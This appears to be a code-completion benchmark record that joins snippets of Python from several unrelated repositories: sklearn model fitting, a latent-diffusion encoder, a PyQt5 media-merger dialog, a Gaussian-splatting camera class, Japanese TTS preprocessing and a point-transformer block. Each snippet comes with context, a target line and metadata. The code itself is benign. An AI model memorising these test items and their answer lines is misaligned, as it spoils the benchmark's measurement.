def fit_model(train_X, train_Y, val_X, val_Y, test_X, test_Y, model_type='lr'):
if model_type == 'lr':
pipe = Pipeline(steps=[
('model', LogisticRegression(random_state=42, n_jobs=-1))
])
param_grid = {
'model__C': 10**np.linspace(-5, 1, 10)
}
elif model_type == 'rf':
pipe = Pipeline(steps=[
('model', RandomForestClassifier(random_state=42, n_jobs=-1))
# ('model', XGBClassifier(random_state=42, n_jobs=-1))
])
param_grid = {
'model__max_depth': list(range(1, 7))
}
else:
raise NotImplementedError
pds = PredefinedSplit(test_fold=np.concatenate([np.ones((len(train_X),))*-1, np.zeros((len(val_X),))]))
cv_lr = (GridSearchCV(pipe, param_grid, refit=False, cv=pds, scoring='roc_auc_ovr', verbose=10, n_jobs=-1).fit(
np.concatenate((train_X, val_X)), np.concatenate((train_Y, val_Y))))
pipe = clone(
clone(pipe).set_params(**cv_lr.best_params_)
)
pipe = pipe.fit(train_X, train_Y)
label_set = np.sort(np.unique(train_Y))
res = {}
for sset, X, Y in zip(['va', 'te'], [val_X, test_X], [val_Y, test_Y]):
preds = pipe.predict_proba(X)
if len(label_set) == 2:
preds = preds[:, 1]
preds_rounded = preds >= 0.5
else:
preds_rounded = preds.argmax(1)
|
def get_representations(algorithm, loader, device):
ys, atts, zs = [], [], []
algorithm.eval()
with torch.no_grad():
for _, x, y, a in loader:
z = algorithm.return_feats(x.to(device)).detach().cpu().numpy()
zs.append(z)
ys.append(y)
atts.append(a)
return np.concatenate(zs, axis=0), np.concatenate(atts, axis=0), np.concatenate(ys, axis=0)
def fit_model(train_X, train_Y, val_X, val_Y, test_X, test_Y, model_type='lr'):
if model_type == 'lr':
pipe = Pipeline(steps=[
('model', LogisticRegression(random_state=42, n_jobs=-1))
])
param_grid = {
'model__C': 10**np.linspace(-5, 1, 10)
}
elif model_type == 'rf':
pipe = Pipeline(steps=[
('model', RandomForestClassifier(random_state=42, n_jobs=-1))
# ('model', XGBClassifier(random_state=42, n_jobs=-1))
])
param_grid = {
'model__max_depth': list(range(1, 7))
}
else:
raise NotImplementedError
pds = PredefinedSplit(test_fold=np.concatenate([np.ones((len(train_X),))*-1, np.zeros((len(val_X),))]))
cv_lr = (GridSearchCV(pipe, param_grid, refit=False, cv=pds, scoring='roc_auc_ovr', verbose=10, n_jobs=-1).fit(
np.concatenate((train_X, val_X)), np.concatenate((train_Y, val_Y))))
pipe = clone(
clone(pipe).set_params(**cv_lr.best_params_)
)
pipe = pipe.fit(train_X, train_Y)
label_set = np.sort(np.unique(train_Y))
res = {}
for sset, X, Y in zip(['va', 'te'], [val_X, test_X], [val_Y, test_Y]):
preds = pipe.predict_proba(X)
if len(label_set) == 2:
preds = preds[:, 1]
preds_rounded = preds >= 0.5
else:
preds_rounded = preds.argmax(1)
| res[sset] = binary_metrics(Y, preds_rounded, label_set=label_set, return_arrays=True) | 0 | 2023-12-15 04:10:31+00:00 | 2k |
RomGai/BrainVis | dc_ldm/modules/encoders/modules.py | [
{
"identifier": "Encoder",
"path": "dc_ldm/modules/x_transformer.py",
"snippet": "class Encoder(AttentionLayers):\n def __init__(self, **kwargs):\n assert 'causal' not in kwargs, 'cannot set causality on encoder'\n super().__init__(causal=False, **kwargs)"
},
{
"identifier": "TransformerWrapper",
"path": "dc_ldm/modules/x_transformer.py",
"snippet": "class TransformerWrapper(nn.Module):\n def __init__(\n self,\n *,\n num_tokens,\n max_seq_len,\n attn_layers,\n emb_dim=None,\n max_mem_len=0.,\n emb_dropout=0.,\n num_memory_tokens=None,\n tie_embedding=False,\n use_pos_emb=True\n ):\n super().__init__()\n assert isinstance(attn_layers, AttentionLayers), 'attention layers must be one of Encoder or Decoder'\n\n dim = attn_layers.dim\n emb_dim = default(emb_dim, dim)\n\n self.max_seq_len = max_seq_len\n self.max_mem_len = max_mem_len\n self.num_tokens = num_tokens\n\n self.token_emb = nn.Embedding(num_tokens, emb_dim)\n self.pos_emb = AbsolutePositionalEmbedding(emb_dim, max_seq_len) if (\n use_pos_emb and not attn_layers.has_pos_emb) else always(0)\n self.emb_dropout = nn.Dropout(emb_dropout)\n\n self.project_emb = nn.Linear(emb_dim, dim) if emb_dim != dim else nn.Identity()\n self.attn_layers = attn_layers\n self.norm = nn.LayerNorm(dim)\n\n self.init_()\n\n self.to_logits = nn.Linear(dim, num_tokens) if not tie_embedding else lambda t: t @ self.token_emb.weight.t()\n\n # memory tokens (like [cls]) from Memory Transformers paper\n num_memory_tokens = default(num_memory_tokens, 0)\n self.num_memory_tokens = num_memory_tokens\n if num_memory_tokens > 0:\n self.memory_tokens = nn.Parameter(torch.randn(num_memory_tokens, dim))\n\n # let funnel encoder know number of memory tokens, if specified\n if hasattr(attn_layers, 'num_memory_tokens'):\n attn_layers.num_memory_tokens = num_memory_tokens\n\n def init_(self):\n nn.init.normal_(self.token_emb.weight, std=0.02)\n\n def forward(\n self,\n x,\n return_embeddings=False,\n mask=None,\n return_mems=False,\n return_attn=False,\n mems=None,\n **kwargs\n ):\n # b, n, device, num_mem = *x.shape, x.device, self.num_memory_tokens\n b = x.shape[0]\n device = x.device\n num_mem = self.num_memory_tokens\n \n x = self.token_emb(x)\n x += self.pos_emb(x)\n x = self.emb_dropout(x)\n\n x = self.project_emb(x)\n\n if num_mem > 0:\n mem = repeat(self.memory_tokens, 'n d -> b n d', b=b)\n x = torch.cat((mem, x), dim=1)\n\n # auto-handle masking after appending memory tokens\n if exists(mask):\n mask = F.pad(mask, (num_mem, 0), value=True)\n\n x, intermediates = self.attn_layers(x, mask=mask, mems=mems, return_hiddens=True, **kwargs)\n x = self.norm(x)\n\n mem, x = x[:, :num_mem], x[:, num_mem:]\n\n out = self.to_logits(x) if not return_embeddings else x\n\n if return_mems:\n hiddens = intermediates.hiddens\n new_mems = list(map(lambda pair: torch.cat(pair, dim=-2), zip(mems, hiddens))) if exists(mems) else hiddens\n new_mems = list(map(lambda t: t[..., -self.max_mem_len:, :].detach(), new_mems))\n return out, new_mems\n\n if return_attn:\n attn_maps = list(map(lambda t: t.post_softmax_attn, intermediates.attn_intermediates))\n return out, attn_maps\n\n return out"
}
] | import torch
import torch.nn as nn
import sys
import kornia
from functools import partial
from PIL import Image
from einops import rearrange, repeat
from transformers import CLIPTokenizer, CLIPTextModel, AutoProcessor, CLIPVisionModel, CLIPVisionModelWithProjection
from dc_ldm.modules.x_transformer import Encoder, TransformerWrapper # TODO: can we directly rely on lucidrains code and simply add this as a reuirement? --> test
from transformers import BertTokenizerFast # TODO: add to reuquirements | 1,310 | # import clip
sys.path.append('../dreamdiffusion/code/')
class AbstractEncoder(nn.Module):
def __init__(self):
super().__init__()
def encode(self, *args, **kwargs):
raise NotImplementedError
class ClassEmbedder(nn.Module):
def __init__(self, embed_dim, n_classes=1000, key='class'):
super().__init__()
self.key = key
self.embedding = nn.Embedding(n_classes, embed_dim)
def forward(self, batch, key=None):
if key is None:
key = self.key
# this is for use in crossattn
c = batch[key][:, None]
c = self.embedding(c)
return c
class TransformerEmbedder(AbstractEncoder):
"""Some transformer encoder layers"""
def __init__(self, n_embed, n_layer, vocab_size, max_seq_len=77, device="cuda"):
super().__init__()
self.device = device
| # import clip
sys.path.append('../dreamdiffusion/code/')
class AbstractEncoder(nn.Module):
def __init__(self):
super().__init__()
def encode(self, *args, **kwargs):
raise NotImplementedError
class ClassEmbedder(nn.Module):
def __init__(self, embed_dim, n_classes=1000, key='class'):
super().__init__()
self.key = key
self.embedding = nn.Embedding(n_classes, embed_dim)
def forward(self, batch, key=None):
if key is None:
key = self.key
# this is for use in crossattn
c = batch[key][:, None]
c = self.embedding(c)
return c
class TransformerEmbedder(AbstractEncoder):
"""Some transformer encoder layers"""
def __init__(self, n_embed, n_layer, vocab_size, max_seq_len=77, device="cuda"):
super().__init__()
self.device = device | self.transformer = TransformerWrapper(num_tokens=vocab_size, max_seq_len=max_seq_len, | 1 | 2023-12-16 12:52:14+00:00 | 2k |
Rajeshwaran2001/DRM-Media-Tool | file_merger_dialog.py | [
{
"identifier": "show_error_message",
"path": "helper/message.py",
"snippet": "def show_error_message(parent, message):\n error_box = QMessageBox()\n error_box.setIcon(QMessageBox.Critical)\n error_box.setWindowTitle(\"Error\")\n error_box.setText(message)\n error_box.setWindowIcon(parent.windowIcon())\n error_box.exec_()"
},
{
"identifier": "show_success_message",
"path": "helper/message.py",
"snippet": "def show_success_message(parent, message):\n success_box = QMessageBox()\n success_box.setIcon(QMessageBox.Information)\n success_box.setWindowTitle(\"Success\")\n success_box.setText(message)\n success_box.setWindowIcon(parent.windowIcon())\n success_box.exec_()"
}
] | from PyQt5.QtWidgets import QWidget, QDialog, QVBoxLayout, QLabel, QTableWidget, QPushButton, QHBoxLayout, QTableWidgetItem, QCheckBox
from helper.message import show_error_message, show_success_message
import os
import json
import subprocess | 1,213 |
class FileMergerDialog(QDialog):
def __init__(self, debug_logger, info_logger, folder_path, parent=None):
super().__init__(parent)
self.folder_path = folder_path
self.setWindowTitle("Files Merger")
self.setGeometry(100, 100, 600, 300)
self.layout = QVBoxLayout()
self.file_table_label = QLabel("Files in Directory:")
self.file_table_widget = QTableWidget()
self.file_table_widget.setColumnCount(
3) # Added a column for checkboxes
self.file_table_widget.setHorizontalHeaderLabels(
["File Name", "Select", "Type"])
self.merge_button = QPushButton("Merge")
self.merge_button.clicked.connect(self.merge_files)
self.layout.addWidget(self.file_table_label)
self.layout.addWidget(self.file_table_widget)
self.layout.addWidget(self.merge_button)
self.setLayout(self.layout)
self.populate_file_table()
self.file_table_widget.setColumnWidth(0, 400)
self.debug_logger = debug_logger
self.info_logger = info_logger
def populate_file_table(self):
# Clear existing items in the table widget
self.file_table_widget.setRowCount(0)
try:
# List only video and audio files in the specified directory
video_files = [file for file in os.listdir(
self.folder_path) if file.lower().endswith(('.mp4', '.mkv', '.avi', '.webm'))]
audio_files = [file for file in os.listdir(
self.folder_path) if file.lower().endswith(('.mp3', '.wav', '.ogg', '.m4a', '.webm'))]
# Add video files to the table widget
for idx, file in enumerate(video_files):
self.add_file_to_table(idx, file, "Video")
# Add audio files to the table widget
for idx, file in enumerate(audio_files, start=len(video_files)):
self.add_file_to_table(idx, file, "Audio")
except FileNotFoundError:
# Handle the case where the specified directory does not exist
self.file_table_widget.setRowCount(1)
self.file_table_widget.setItem(
0, 2, QTableWidgetItem("Directory not found"))
def add_file_to_table(self, idx, file, file_type):
self.file_table_widget.insertRow(idx)
# Center-align the content in the first column
item_file_name = QTableWidgetItem(file)
item_file_name.setTextAlignment(0x0004 | 0x0080) # AlignCenter
self.file_table_widget.setItem(idx, 0, item_file_name)
# Create a widget for the checkbox and center-align it
checkbox_widget = QWidget()
checkbox_layout = QHBoxLayout(checkbox_widget)
checkbox_layout.addStretch(3)
checkbox = QCheckBox()
checkbox.setChecked(False)
checkbox_layout.addWidget(checkbox)
checkbox_layout.addStretch(3)
# Set the widget with the centered checkbox in the second column
self.file_table_widget.setCellWidget(idx, 1, checkbox_widget)
# Set the file type in the third column
self.file_table_widget.setItem(idx, 2, QTableWidgetItem(file_type))
def merge_files(self):
selected_files = []
metadata = {}
for row in range(self.file_table_widget.rowCount()):
checkbox = self.file_table_widget.cellWidget(
row, 1).layout().itemAt(1).widget()
if checkbox.isChecked():
file_name = self.file_table_widget.item(row, 0).text()
file_type = self.file_table_widget.item(row, 2).text()
selected_files.append((file_name, file_type))
# Check that at least one video and one audio file are selected
if any(file_type == 'Video' for (_, file_type) in selected_files) and \
any(file_type == 'Audio' for (_, file_type) in selected_files):
# Get all files in the directory ending with .info.json
info_files = [file for file in os.listdir(
self.folder_path) if file.endswith('.info.json')]
img_files = [file for file in os.listdir(
self.folder_path) if file.lower().endswith(('.jpg', '.jpeg', '.png', '.webp'))]
language_mapping = {
'en': 'eng',
'eng': 'eng',
'english': 'eng',
'ta': 'tam',
'tamil': 'tam',
'tam': 'tam'
}
# Define language codes
language_codes = list(language_mapping.keys())
suffixes = tuple(f'.{code}.vtt' for code in language_codes)
subtitle_files = [file for file in os.listdir(
self.folder_path) if file.endswith(suffixes)]
thumbnail_file = None # Initialize with a default value
# print(subtitle_files)
if not info_files:
|
class FileMergerDialog(QDialog):
def __init__(self, debug_logger, info_logger, folder_path, parent=None):
super().__init__(parent)
self.folder_path = folder_path
self.setWindowTitle("Files Merger")
self.setGeometry(100, 100, 600, 300)
self.layout = QVBoxLayout()
self.file_table_label = QLabel("Files in Directory:")
self.file_table_widget = QTableWidget()
self.file_table_widget.setColumnCount(
3) # Added a column for checkboxes
self.file_table_widget.setHorizontalHeaderLabels(
["File Name", "Select", "Type"])
self.merge_button = QPushButton("Merge")
self.merge_button.clicked.connect(self.merge_files)
self.layout.addWidget(self.file_table_label)
self.layout.addWidget(self.file_table_widget)
self.layout.addWidget(self.merge_button)
self.setLayout(self.layout)
self.populate_file_table()
self.file_table_widget.setColumnWidth(0, 400)
self.debug_logger = debug_logger
self.info_logger = info_logger
def populate_file_table(self):
# Clear existing items in the table widget
self.file_table_widget.setRowCount(0)
try:
# List only video and audio files in the specified directory
video_files = [file for file in os.listdir(
self.folder_path) if file.lower().endswith(('.mp4', '.mkv', '.avi', '.webm'))]
audio_files = [file for file in os.listdir(
self.folder_path) if file.lower().endswith(('.mp3', '.wav', '.ogg', '.m4a', '.webm'))]
# Add video files to the table widget
for idx, file in enumerate(video_files):
self.add_file_to_table(idx, file, "Video")
# Add audio files to the table widget
for idx, file in enumerate(audio_files, start=len(video_files)):
self.add_file_to_table(idx, file, "Audio")
except FileNotFoundError:
# Handle the case where the specified directory does not exist
self.file_table_widget.setRowCount(1)
self.file_table_widget.setItem(
0, 2, QTableWidgetItem("Directory not found"))
def add_file_to_table(self, idx, file, file_type):
self.file_table_widget.insertRow(idx)
# Center-align the content in the first column
item_file_name = QTableWidgetItem(file)
item_file_name.setTextAlignment(0x0004 | 0x0080) # AlignCenter
self.file_table_widget.setItem(idx, 0, item_file_name)
# Create a widget for the checkbox and center-align it
checkbox_widget = QWidget()
checkbox_layout = QHBoxLayout(checkbox_widget)
checkbox_layout.addStretch(3)
checkbox = QCheckBox()
checkbox.setChecked(False)
checkbox_layout.addWidget(checkbox)
checkbox_layout.addStretch(3)
# Set the widget with the centered checkbox in the second column
self.file_table_widget.setCellWidget(idx, 1, checkbox_widget)
# Set the file type in the third column
self.file_table_widget.setItem(idx, 2, QTableWidgetItem(file_type))
def merge_files(self):
selected_files = []
metadata = {}
for row in range(self.file_table_widget.rowCount()):
checkbox = self.file_table_widget.cellWidget(
row, 1).layout().itemAt(1).widget()
if checkbox.isChecked():
file_name = self.file_table_widget.item(row, 0).text()
file_type = self.file_table_widget.item(row, 2).text()
selected_files.append((file_name, file_type))
# Check that at least one video and one audio file are selected
if any(file_type == 'Video' for (_, file_type) in selected_files) and \
any(file_type == 'Audio' for (_, file_type) in selected_files):
# Get all files in the directory ending with .info.json
info_files = [file for file in os.listdir(
self.folder_path) if file.endswith('.info.json')]
img_files = [file for file in os.listdir(
self.folder_path) if file.lower().endswith(('.jpg', '.jpeg', '.png', '.webp'))]
language_mapping = {
'en': 'eng',
'eng': 'eng',
'english': 'eng',
'ta': 'tam',
'tamil': 'tam',
'tam': 'tam'
}
# Define language codes
language_codes = list(language_mapping.keys())
suffixes = tuple(f'.{code}.vtt' for code in language_codes)
subtitle_files = [file for file in os.listdir(
self.folder_path) if file.endswith(suffixes)]
thumbnail_file = None # Initialize with a default value
# print(subtitle_files)
if not info_files: | show_error_message(self, "Error: No Metadata files found.") | 0 | 2023-12-18 11:50:40+00:00 | 2k |
gmum/ViewingDirectionGaussianSplatting | scene/cameras.py | [
{
"identifier": "getWorld2View2",
"path": "utils/graphics_utils.py",
"snippet": "def getWorld2View2(R, t, translate=np.array([.0, .0, .0]), scale=1.0):\n Rt = np.zeros((4, 4))\n Rt[:3, :3] = R.transpose()\n Rt[:3, 3] = t\n Rt[3, 3] = 1.0\n\n C2W = np.linalg.inv(Rt)\n cam_center = C2W[:3, 3]\n cam_center = (cam_center + translate) * scale\n C2W[:3, 3] = cam_center\n Rt = np.linalg.inv(C2W)\n return np.float32(Rt)"
},
{
"identifier": "getProjectionMatrix",
"path": "utils/graphics_utils.py",
"snippet": "def getProjectionMatrix(znear, zfar, fovX, fovY):\n tanHalfFovY = math.tan((fovY / 2))\n tanHalfFovX = math.tan((fovX / 2))\n\n top = tanHalfFovY * znear\n bottom = -top\n right = tanHalfFovX * znear\n left = -right\n\n P = torch.zeros(4, 4)\n\n z_sign = 1.0\n\n P[0, 0] = 2.0 * znear / (right - left)\n P[1, 1] = 2.0 * znear / (top - bottom)\n P[0, 2] = (right + left) / (right - left)\n P[1, 2] = (top + bottom) / (top - bottom)\n P[3, 2] = z_sign\n P[2, 2] = z_sign * zfar / (zfar - znear)\n P[2, 3] = -(zfar * znear) / (zfar - znear)\n return P"
}
] | import torch
import numpy as np
from torch import nn
from utils.graphics_utils import getWorld2View2, getProjectionMatrix | 915 | #
# Copyright (C) 2023, Inria
# GRAPHDECO research group, https://team.inria.fr/graphdeco
# All rights reserved.
#
# This software is free for non-commercial, research and evaluation use
# under the terms of the LICENSE.md file.
#
# For inquiries contact [email protected]
#
class Camera(nn.Module):
def __init__(self, colmap_id, R, T, FoVx, FoVy, image, gt_alpha_mask,
image_name, uid,
trans=np.array([0.0, 0.0, 0.0]), scale=1.0, data_device = "cuda"
):
super(Camera, self).__init__()
self.uid = uid
self.colmap_id = colmap_id
self.R = R
self.T = T
self.FoVx = FoVx
self.FoVy = FoVy
self.image_name = image_name
try:
self.data_device = torch.device(data_device)
except Exception as e:
print(e)
print(f"[Warning] Custom device {data_device} failed, fallback to default cuda device" )
self.data_device = torch.device("cuda")
self.original_image = image.clamp(0.0, 1.0).to(self.data_device)
self.image_width = self.original_image.shape[2]
self.image_height = self.original_image.shape[1]
if gt_alpha_mask is not None:
self.original_image *= gt_alpha_mask.to(self.data_device)
else:
self.original_image *= torch.ones((1, self.image_height, self.image_width), device=self.data_device)
self.zfar = 100.0
self.znear = 0.01
self.trans = trans
self.scale = scale
self.world_view_transform = torch.tensor(getWorld2View2(R, T, trans, scale)).transpose(0, 1).cuda()
| #
# Copyright (C) 2023, Inria
# GRAPHDECO research group, https://team.inria.fr/graphdeco
# All rights reserved.
#
# This software is free for non-commercial, research and evaluation use
# under the terms of the LICENSE.md file.
#
# For inquiries contact [email protected]
#
class Camera(nn.Module):
def __init__(self, colmap_id, R, T, FoVx, FoVy, image, gt_alpha_mask,
image_name, uid,
trans=np.array([0.0, 0.0, 0.0]), scale=1.0, data_device = "cuda"
):
super(Camera, self).__init__()
self.uid = uid
self.colmap_id = colmap_id
self.R = R
self.T = T
self.FoVx = FoVx
self.FoVy = FoVy
self.image_name = image_name
try:
self.data_device = torch.device(data_device)
except Exception as e:
print(e)
print(f"[Warning] Custom device {data_device} failed, fallback to default cuda device" )
self.data_device = torch.device("cuda")
self.original_image = image.clamp(0.0, 1.0).to(self.data_device)
self.image_width = self.original_image.shape[2]
self.image_height = self.original_image.shape[1]
if gt_alpha_mask is not None:
self.original_image *= gt_alpha_mask.to(self.data_device)
else:
self.original_image *= torch.ones((1, self.image_height, self.image_width), device=self.data_device)
self.zfar = 100.0
self.znear = 0.01
self.trans = trans
self.scale = scale
self.world_view_transform = torch.tensor(getWorld2View2(R, T, trans, scale)).transpose(0, 1).cuda() | self.projection_matrix = getProjectionMatrix(znear=self.znear, zfar=self.zfar, fovX=self.FoVx, fovY=self.FoVy).transpose(0,1).cuda() | 1 | 2023-12-21 10:09:17+00:00 | 2k |
tonnetonne814/PL-Bert-VITS2 | preprocess_ja.py | [
{
"identifier": "TextCleaner",
"path": "PL_BERT_ja/text_utils.py",
"snippet": "class TextCleaner:\n def __init__(self, dummy=None):\n self.word_index_dictionary = symbol_to_id\n def __call__(self, text):\n indexes = []\n japanese = False\n for char in text:\n try:\n indexes.append(self.word_index_dictionary[char])\n except:\n if char == \"。\" or char == \"、\":\n indexes.append(0) # padとして扱う\n\n return indexes"
},
{
"identifier": "phonemize",
"path": "PL_BERT_ja/phonemize.py",
"snippet": "def phonemize(text, tokenizer):\n text = unicodedata.normalize(\"NFKC\", text)\n words = tokenizer.tokenize(text)\n input_ids_ = tokenizer.convert_tokens_to_ids(words)\n \n phonemes = []\n input_ids = []\n for i in range(len(words)):\n word = words[i]\n input_id = input_ids_[i]\n phoneme = global_phonemize(word.replace('#', ''))\n if len(phoneme) != 0:\n phonemes.append(''.join(phoneme))\n input_ids.append(input_id)\n \n assert len(input_ids) == len(phonemes)\n return {'input_ids' : input_ids, 'phonemes': phonemes}"
},
{
"identifier": "MultiTaskModel",
"path": "PL_BERT_ja/model.py",
"snippet": "class MultiTaskModel(nn.Module):\n def __init__(self, model, num_tokens, num_vocab, hidden_size):\n super().__init__()\n\n self.encoder = model\n self.mask_predictor = nn.Linear(hidden_size, num_tokens)\n self.word_predictor = nn.Linear(hidden_size, num_vocab)\n \n def forward(self, phonemes, attention_mask=None):\n output = self.encoder(phonemes, attention_mask=attention_mask, output_hidden_states=True)\n tokens_pred = self.mask_predictor(output.last_hidden_state)\n words_pred = self.word_predictor(output.last_hidden_state)\n \n return tokens_pred, words_pred, output"
}
] | import argparse
import os
import polars
import random
import torch
import yaml, torch
from PL_BERT_ja.text_utils import TextCleaner
from PL_BERT_ja.phonemize import phonemize
from tqdm import tqdm
from PL_BERT_ja.model import MultiTaskModel
from transformers import AlbertConfig, AlbertModel
from transformers import BertJapaneseTokenizer | 1,456 |
def preprocess(dataset_dir, pl_bert_dir):
n_val_test_file = 10
filelist_dir = "./filelists/"
dataset_name = "jvnv_ver1"
os.makedirs(filelist_dir, exist_ok=True)
split_symbol = "||||"
transcript_csv_df = polars.read_csv(os.path.join(dataset_dir, "jvnv_v1", "transcription.csv"),has_header=False)[:, 0]
emo_list = os.listdir(os.path.join(dataset_dir,"jvnv_v1", "F1"))
style_list = os.listdir(os.path.join(dataset_dir,"jvnv_v1", "F1", "anger"))
pl_bert_savedir = "./pl_bert_embeddings"
os.makedirs(pl_bert_savedir, exist_ok=True)
pl_bert_model, pl_bert_config, device = get_pl_bert_ja(dir=pl_bert_dir)
pl_bert_cleaner = TextCleaner()
pl_bert_tokenizer = BertJapaneseTokenizer.from_pretrained(pl_bert_config['dataset_params']['tokenizer'])
hidden_size = pl_bert_config["model_params"]["hidden_size"]
n_layers = pl_bert_config["model_params"]["num_hidden_layers"] + 1
filelists = list()
spk_g = ["F", "M"]
for line in tqdm(transcript_csv_df):
index_name, emo_prefix, text = line.split("|")
emotion, style, file_idx = index_name.split("_")
text = text.replace("\n", "")
phonemes = ''.join(phonemize(text,pl_bert_tokenizer)["phonemes"])
input_ids = pl_bert_cleaner(phonemes)
with torch.inference_mode():
hidden_stats = pl_bert_model(torch.tensor(input_ids, dtype=torch.int64, device=device).unsqueeze(0))[-1]["hidden_states"]
save_tensor = torch.zeros(size=(n_layers, len(input_ids), hidden_size), device=device)
for idx, hidden_stat in enumerate(hidden_stats):
save_tensor[idx, :, :] = hidden_stat
torch.save(save_tensor.to('cpu').detach(), os.path.join(pl_bert_savedir, f"{index_name}.PlBertJa"))
for g_idx in range(2):
for spk_idx in range(2):
spk_ID = str(g_idx + spk_idx*2)
spk = spk_g[g_idx] + str(spk_idx+1)
wav_path = os.path.join(dataset_dir, "jvnv_v1", spk, emotion, style, f"{spk}_{emotion}_{style}_{file_idx}.wav")
filelists.append(f"{wav_path}{split_symbol}{spk_ID}{split_symbol}{phonemes}{split_symbol}{text}{split_symbol}{index_name}{split_symbol}emo:{str(emo_list.index(emotion))}{split_symbol}style:{str(style_list.index(style))}\n")
val_list = list()
test_list = list()
for idx in range(n_val_test_file*2):
target_idx = random.randint(0, len(filelists) - 1)
target_line = filelists.pop(target_idx)
if idx % 2 == 1:
val_list.append(target_line)
else:
test_list.append(target_line)
write_txt(filelists, os.path.join(filelist_dir, f"{dataset_name}_train.txt"))
write_txt(val_list, os.path.join(filelist_dir, f"{dataset_name}_val.txt"))
write_txt(test_list, os.path.join(filelist_dir, f"{dataset_name}_test.txt"))
return 0
def write_txt(lists, path):
with open(path, mode="w", encoding="utf-8") as f:
f.writelines(lists)
def get_pl_bert_ja(dir):
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
config_path=os.path.join(dir, "config.yml")
config = yaml.safe_load(open(config_path))
albert_base_configuration = AlbertConfig(**config['model_params'])
bert_ = AlbertModel(albert_base_configuration).to(device)
#num_vocab = max([m['token'] for m in token_maps.values()]) + 1 # 30923 + 1
|
def preprocess(dataset_dir, pl_bert_dir):
n_val_test_file = 10
filelist_dir = "./filelists/"
dataset_name = "jvnv_ver1"
os.makedirs(filelist_dir, exist_ok=True)
split_symbol = "||||"
transcript_csv_df = polars.read_csv(os.path.join(dataset_dir, "jvnv_v1", "transcription.csv"),has_header=False)[:, 0]
emo_list = os.listdir(os.path.join(dataset_dir,"jvnv_v1", "F1"))
style_list = os.listdir(os.path.join(dataset_dir,"jvnv_v1", "F1", "anger"))
pl_bert_savedir = "./pl_bert_embeddings"
os.makedirs(pl_bert_savedir, exist_ok=True)
pl_bert_model, pl_bert_config, device = get_pl_bert_ja(dir=pl_bert_dir)
pl_bert_cleaner = TextCleaner()
pl_bert_tokenizer = BertJapaneseTokenizer.from_pretrained(pl_bert_config['dataset_params']['tokenizer'])
hidden_size = pl_bert_config["model_params"]["hidden_size"]
n_layers = pl_bert_config["model_params"]["num_hidden_layers"] + 1
filelists = list()
spk_g = ["F", "M"]
for line in tqdm(transcript_csv_df):
index_name, emo_prefix, text = line.split("|")
emotion, style, file_idx = index_name.split("_")
text = text.replace("\n", "")
phonemes = ''.join(phonemize(text,pl_bert_tokenizer)["phonemes"])
input_ids = pl_bert_cleaner(phonemes)
with torch.inference_mode():
hidden_stats = pl_bert_model(torch.tensor(input_ids, dtype=torch.int64, device=device).unsqueeze(0))[-1]["hidden_states"]
save_tensor = torch.zeros(size=(n_layers, len(input_ids), hidden_size), device=device)
for idx, hidden_stat in enumerate(hidden_stats):
save_tensor[idx, :, :] = hidden_stat
torch.save(save_tensor.to('cpu').detach(), os.path.join(pl_bert_savedir, f"{index_name}.PlBertJa"))
for g_idx in range(2):
for spk_idx in range(2):
spk_ID = str(g_idx + spk_idx*2)
spk = spk_g[g_idx] + str(spk_idx+1)
wav_path = os.path.join(dataset_dir, "jvnv_v1", spk, emotion, style, f"{spk}_{emotion}_{style}_{file_idx}.wav")
filelists.append(f"{wav_path}{split_symbol}{spk_ID}{split_symbol}{phonemes}{split_symbol}{text}{split_symbol}{index_name}{split_symbol}emo:{str(emo_list.index(emotion))}{split_symbol}style:{str(style_list.index(style))}\n")
val_list = list()
test_list = list()
for idx in range(n_val_test_file*2):
target_idx = random.randint(0, len(filelists) - 1)
target_line = filelists.pop(target_idx)
if idx % 2 == 1:
val_list.append(target_line)
else:
test_list.append(target_line)
write_txt(filelists, os.path.join(filelist_dir, f"{dataset_name}_train.txt"))
write_txt(val_list, os.path.join(filelist_dir, f"{dataset_name}_val.txt"))
write_txt(test_list, os.path.join(filelist_dir, f"{dataset_name}_test.txt"))
return 0
def write_txt(lists, path):
with open(path, mode="w", encoding="utf-8") as f:
f.writelines(lists)
def get_pl_bert_ja(dir):
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
config_path=os.path.join(dir, "config.yml")
config = yaml.safe_load(open(config_path))
albert_base_configuration = AlbertConfig(**config['model_params'])
bert_ = AlbertModel(albert_base_configuration).to(device)
#num_vocab = max([m['token'] for m in token_maps.values()]) + 1 # 30923 + 1 | bert = MultiTaskModel( | 2 | 2023-12-16 05:34:02+00:00 | 2k |
Ruiyuan-Zhang/CCS | multi_part_assembly/models/modules/encoder/point_transformer/transformer.py | [
{
"identifier": "index_points",
"path": "multi_part_assembly/models/modules/encoder/point_transformer/pointnet_util.py",
"snippet": "def index_points(points, idx):\n \"\"\"\n Input:\n points: input points data, [B, N, C]\n idx: sample index data, [B, S, [K]]\n Return:\n new_points:, indexed points data, [B, S, [K], C]\n \"\"\"\n raw_size = idx.size()\n idx = idx.reshape(raw_size[0], -1)\n res = torch.gather(points, 1, idx[..., None].expand(-1, -1, points.size(-1)))\n return res.reshape(*raw_size, -1)"
},
{
"identifier": "square_distance",
"path": "multi_part_assembly/models/modules/encoder/point_transformer/pointnet_util.py",
"snippet": "def square_distance(src, dst):\n \"\"\"\n Calculate Euclid distance between each two points.\n src^T * dst = xn * xm + yn * ym + zn * zm;\n sum(src^2, dim=-1) = xn*xn + yn*yn + zn*zn;\n sum(dst^2, dim=-1) = xm*xm + ym*ym + zm*zm;\n dist = (xn - xm)^2 + (yn - ym)^2 + (zn - zm)^2\n = sum(src**2,dim=-1)+sum(dst**2,dim=-1)-2*src^T*dst\n Input:\n src: source points, [B, N, C]\n dst: target points, [B, M, C]\n Output:\n dist: per-point square distance, [B, N, M]\n \"\"\"\n return torch.sum((src[:, :, None] - dst[:, None]) ** 2, dim=-1)"
}
] | from multi_part_assembly.models.modules.encoder.point_transformer.pointnet_util import index_points, square_distance
import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np | 664 |
class TransformerBlock(nn.Module):
def __init__(self, d_points, d_model, k) -> None:
super().__init__()
self.fc1 = nn.Linear(d_points, d_model)
self.fc2 = nn.Linear(d_model, d_points)
self.fc_delta = nn.Sequential(
nn.Linear(3, d_model),
nn.ReLU(),
nn.Linear(d_model, d_model)
)
self.fc_gamma = nn.Sequential(
nn.Linear(d_model, d_model),
nn.ReLU(),
nn.Linear(d_model, d_model)
)
self.w_qs = nn.Linear(d_model, d_model, bias=False)
self.w_ks = nn.Linear(d_model, d_model, bias=False)
self.w_vs = nn.Linear(d_model, d_model, bias=False)
self.k = k
# xyz: b x n x 3, features: b x n x f
